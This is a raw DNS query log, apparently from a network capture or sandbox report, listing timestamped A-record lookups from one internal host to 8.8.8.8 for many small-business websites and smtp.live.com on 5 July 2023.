                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:49.975179911 CEST192.168.2.68.8.8.80x2cdbStandard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.099493980 CEST192.168.2.68.8.8.80x1549Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.206526995 CEST192.168.2.68.8.8.80xd855Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.428450108 CEST192.168.2.68.8.8.80xe306Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.428962946 CEST192.168.2.68.8.8.80x5485Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.818856955 CEST192.168.2.68.8.8.80x987bStandard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.819616079 CEST192.168.2.68.8.8.80xef14Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.823828936 CEST192.168.2.68.8.8.80xc54cStandard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.840188026 CEST192.168.2.68.8.8.80x3831Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:50.841888905 CEST192.168.2.68.8.8.80x497dStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.027421951 CEST192.168.2.68.8.8.80xd488Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.872852087 CEST192.168.2.68.8.8.80xc54cStandard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.874358892 CEST192.168.2.68.8.8.80x497dStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:51.874967098 CEST192.168.2.68.8.8.80x3831Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:52.023966074 CEST192.168.2.68.8.8.80xd488Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:52.084913015 CEST192.168.2.68.8.8.80x1549Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:52.881540060 CEST192.168.2.68.8.8.80x3831Standard query (0)www.yocinc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:52.881654978 CEST192.168.2.68.8.8.80x497dStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.043056011 CEST192.168.2.68.8.8.80xd488Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.182785034 CEST192.168.2.68.8.8.80xe95dStandard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.186144114 CEST192.168.2.68.8.8.80x9aa0Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.190393925 CEST192.168.2.68.8.8.80x811dStandard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.481250048 CEST192.168.2.68.8.8.80x98f1Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.481831074 CEST192.168.2.68.8.8.80x8f32Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.561872005 CEST192.168.2.68.8.8.80x9f2dStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.577721119 CEST192.168.2.68.8.8.80xf301Standard query (0)www.vitaindu.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.672898054 CEST192.168.2.68.8.8.80xf78aStandard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:53.767103910 CEST192.168.2.68.8.8.80x9cfbStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.046091080 CEST192.168.2.68.8.8.80x9fb0Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.435184956 CEST192.168.2.68.8.8.80x8102Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.438801050 CEST192.168.2.68.8.8.80x1b34Standard query (0)www.valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.450279951 CEST192.168.2.68.8.8.80x5443Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.739315987 CEST192.168.2.68.8.8.80xde33Standard query (0)www.2print.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.740334034 CEST192.168.2.68.8.8.80x9b74Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:54.793700933 CEST192.168.2.68.8.8.80xd5b0Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.167046070 CEST192.168.2.68.8.8.80x56e3Standard query (0)www.x0c.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.298049927 CEST192.168.2.68.8.8.80xa722Standard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.428159952 CEST192.168.2.68.8.8.80x8102Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.661401987 CEST192.168.2.68.8.8.80xbe22Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.680902004 CEST192.168.2.68.8.8.80x2e8eStandard query (0)www.yumgiskor.kzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:55.752939939 CEST192.168.2.68.8.8.80x7b20Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.003941059 CEST192.168.2.68.8.8.80x92b1Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.009126902 CEST192.168.2.68.8.8.80x901eStandard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:56.754769087 CEST192.168.2.68.8.8.80xf59dStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.032973051 CEST192.168.2.68.8.8.80x877Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.174068928 CEST192.168.2.68.8.8.80x6466Standard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.307580948 CEST192.168.2.68.8.8.80xe9d2Standard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.514484882 CEST192.168.2.68.8.8.80xec46Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.550259113 CEST192.168.2.68.8.8.80x657eStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:57.573075056 CEST192.168.2.68.8.8.80x3a98Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.102874994 CEST192.168.2.68.8.8.80x2beeStandard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.569528103 CEST192.168.2.68.8.8.80x657eStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.569581985 CEST192.168.2.68.8.8.80xec46Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.569649935 CEST192.168.2.68.8.8.80x3a98Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.693274975 CEST192.168.2.68.8.8.80xc2c8Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:58.823103905 CEST192.168.2.68.8.8.80x7f09Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.042735100 CEST192.168.2.68.8.8.80x4a86Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.393719912 CEST192.168.2.68.8.8.80x176dStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.617381096 CEST192.168.2.68.8.8.80x3a98Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.617436886 CEST192.168.2.68.8.8.80x657eStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:05:59.980242014 CEST192.168.2.68.8.8.80x9990Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.142782927 CEST192.168.2.68.8.8.80x5b1dStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.393982887 CEST192.168.2.68.8.8.80x7768Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:00.646420002 CEST192.168.2.68.8.8.80xb14eStandard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:01.079978943 CEST192.168.2.68.8.8.80xea7Standard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:04.294423103 CEST192.168.2.68.8.8.80x337dStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.041157007 CEST192.168.2.68.8.8.80xe866Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:11.091898918 CEST192.168.2.68.8.8.80x6a82Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.473612070 CEST192.168.2.68.8.8.80x10c4Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:13.477236986 CEST192.168.2.68.8.8.80xdb12Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:14.958172083 CEST192.168.2.68.8.8.80x5732Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.545478106 CEST192.168.2.68.8.8.80x81e0Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:15.661622047 CEST192.168.2.68.8.8.80x3806Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.432646036 CEST192.168.2.68.8.8.80x9b7bStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.456295967 CEST192.168.2.68.8.8.80xe25dStandard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.975553036 CEST192.168.2.68.8.8.80xead2Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:16.979706049 CEST192.168.2.68.8.8.80xeb6bStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:17.583384991 CEST192.168.2.68.8.8.80xc026Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:18.697169065 CEST192.168.2.68.8.8.80x2700Standard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.311326027 CEST192.168.2.68.8.8.80xf529Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.715976954 CEST192.168.2.68.8.8.80x2aecStandard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:22.954652071 CEST192.168.2.68.8.8.80x8f61Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:23.451555014 CEST192.168.2.68.8.8.80xc1edStandard query (0)smtp.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:25.938601971 CEST192.168.2.68.8.8.80x1887Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:25.943826914 CEST192.168.2.68.8.8.80xa1f6Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:25.980051041 CEST192.168.2.68.8.8.80x9c5dStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:25.989650011 CEST192.168.2.68.8.8.80x428cStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.004337072 CEST192.168.2.68.8.8.80x7844Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.006872892 CEST192.168.2.68.8.8.80x3b85Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.008754969 CEST192.168.2.68.8.8.80xcfdbStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.012197018 CEST192.168.2.68.8.8.80x68e5Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.012680054 CEST192.168.2.68.8.8.80xbd84Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.022799015 CEST192.168.2.68.8.8.80x9d42Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.945800066 CEST192.168.2.68.8.8.80x1887Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.945940971 CEST192.168.2.68.8.8.80x9c5dStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.946003914 CEST192.168.2.68.8.8.80xa1f6Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:26.994889975 CEST192.168.2.68.8.8.80x9d42Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.002912045 CEST192.168.2.68.8.8.80x7844Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.008388042 CEST192.168.2.68.8.8.80xbd84Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.013608932 CEST192.168.2.68.8.8.80xcfdbStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.019005060 CEST192.168.2.68.8.8.80x3b85Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.027441025 CEST192.168.2.68.8.8.80x68e5Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.033216000 CEST192.168.2.68.8.8.80x428cStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.942133904 CEST192.168.2.68.8.8.80x1887Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.984493971 CEST192.168.2.68.8.8.80xa1f6Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:27.985004902 CEST192.168.2.68.8.8.80x9c5dStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.037189960 CEST192.168.2.68.8.8.80x428cStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.037272930 CEST192.168.2.68.8.8.80x9d42Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.037791967 CEST192.168.2.68.8.8.80x3b85Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.037791967 CEST192.168.2.68.8.8.80xbd84Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.037832022 CEST192.168.2.68.8.8.80x68e5Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.037986040 CEST192.168.2.68.8.8.80xcfdbStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.038078070 CEST192.168.2.68.8.8.80x7844Standard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.421015978 CEST192.168.2.68.8.8.80x26c3Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.421852112 CEST192.168.2.68.8.8.80x452cStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.458571911 CEST192.168.2.68.8.8.80xe88dStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.466895103 CEST192.168.2.68.8.8.80xb7f4Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.851140976 CEST192.168.2.68.8.8.80xa007Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.855326891 CEST192.168.2.68.8.8.80x7214Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.875624895 CEST192.168.2.68.8.8.80x9854Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:28.882261038 CEST192.168.2.68.8.8.80xd794Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.292751074 CEST192.168.2.68.8.8.80xb860Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.414340019 CEST192.168.2.68.8.8.80x7e90Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.426960945 CEST192.168.2.68.8.8.80xbc3aStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.435235977 CEST192.168.2.68.8.8.80x7ab3Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.443698883 CEST192.168.2.68.8.8.80xfd26Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.454094887 CEST192.168.2.68.8.8.80x1d0dStandard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:29.892821074 CEST192.168.2.68.8.8.80x7214Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.072616100 CEST192.168.2.68.8.8.80xbd84Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.087357998 CEST192.168.2.68.8.8.80x2547Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.087543011 CEST192.168.2.68.8.8.80x65a3Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.088685989 CEST192.168.2.68.8.8.80xc0cdStandard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.089534044 CEST192.168.2.68.8.8.80x409Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.097640991 CEST192.168.2.68.8.8.80x5398Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.344521999 CEST192.168.2.68.8.8.80x5b2fStandard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.414385080 CEST192.168.2.68.8.8.80x5ce1Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.842787027 CEST192.168.2.68.8.8.80x9793Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.850052118 CEST192.168.2.68.8.8.80x3e55Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:30.853774071 CEST192.168.2.68.8.8.80x83b7Standard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.293843985 CEST192.168.2.68.8.8.80x4549Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.400105000 CEST192.168.2.68.8.8.80x3423Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.429483891 CEST192.168.2.68.8.8.80x27d1Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.466643095 CEST192.168.2.68.8.8.80x1194Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.559355021 CEST192.168.2.68.8.8.80x5ae7Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.890639067 CEST192.168.2.68.8.8.80xce7eStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.897435904 CEST192.168.2.68.8.8.80x2e64Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:31.906603098 CEST192.168.2.68.8.8.80x5e73Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.364111900 CEST192.168.2.68.8.8.80x78e6Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.365590096 CEST192.168.2.68.8.8.80x9734Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.507707119 CEST192.168.2.68.8.8.80x5856Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.507884026 CEST192.168.2.68.8.8.80x8bacStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:32.525051117 CEST192.168.2.68.8.8.80x598eStandard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.281987906 CEST192.168.2.68.8.8.80x62edStandard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.285559893 CEST192.168.2.68.8.8.80x875fStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.293504953 CEST192.168.2.68.8.8.80x129cStandard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.592390060 CEST192.168.2.68.8.8.80x21edStandard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.592709064 CEST192.168.2.68.8.8.80x8be9Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.598706961 CEST192.168.2.68.8.8.80xf472Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:33.968597889 CEST192.168.2.68.8.8.80x1943Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.344832897 CEST192.168.2.68.8.8.80xd066Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.369609118 CEST192.168.2.68.8.8.80x151dStandard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.578105927 CEST192.168.2.68.8.8.80xecdfStandard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.581595898 CEST192.168.2.68.8.8.80xa7eeStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.584860086 CEST192.168.2.68.8.8.80x7324Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.587373018 CEST192.168.2.68.8.8.80x98cbStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.589107037 CEST192.168.2.68.8.8.80xdd59Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.591849089 CEST192.168.2.68.8.8.80x6c81Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.598521948 CEST192.168.2.68.8.8.80xdec3Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.599769115 CEST192.168.2.68.8.8.80x4ebfStandard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:06:34.601084948 CEST192.168.2.68.8.8.80x9ae2Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
